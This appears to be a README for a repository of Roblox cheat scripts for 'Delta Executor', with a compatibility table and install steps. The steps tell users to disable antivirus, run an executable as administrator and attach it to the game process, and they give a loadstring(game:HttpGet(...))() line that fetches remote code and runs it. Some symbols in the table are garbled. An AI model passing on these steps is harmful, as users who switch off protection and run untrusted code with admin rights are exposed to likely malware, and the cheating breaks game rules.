Optimized scripts for Delta Executor β Windows only (macOS/Linux coming soon).
This repo contains 10+ scripts for popular Roblox games (AdoptMe, Rivals, War Tycoon, MM2, Blox Fruits, etc.). All scripts are tested with Delta Executor for stable performance on Windows 10/11.
- Optimized for Delta β fast and stable execution.
- Weekly updates β new scripts and fixes.
- Easy to use β copy-paste or load via URL.
- Open source β modify scripts as you like.
| Executor | Windows | macOS | Linux |
|---|---|---|---|
| Delta | β | π | π |
| Synapse X | β | β | β |
| Krnl | β | β * | β |
| Fluxus | β | β * | β |
*via Wine/emulator. π = in development.
- Download.
- Extract the ZIP to any folder.
- Temporarily disable antivirus (false positives are common).
- Run
DeltaExecutor.exeas administrator. - Click Attach and select the Roblox process.
- Paste a script and hit Execute
Most scripts can be loaded directly using the following pattern:
loadstring(game:HttpGet("https://raw.githubusercontent.com/YOUR_USERNAME/YOUR_REPO/main/scripts/SCRIPT_NAME.lua"))()